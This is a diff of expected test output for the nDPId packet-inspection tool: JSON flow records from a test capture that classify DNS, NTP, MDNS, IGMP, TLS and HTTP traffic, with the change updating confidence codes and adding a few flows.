-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
-00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
+00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
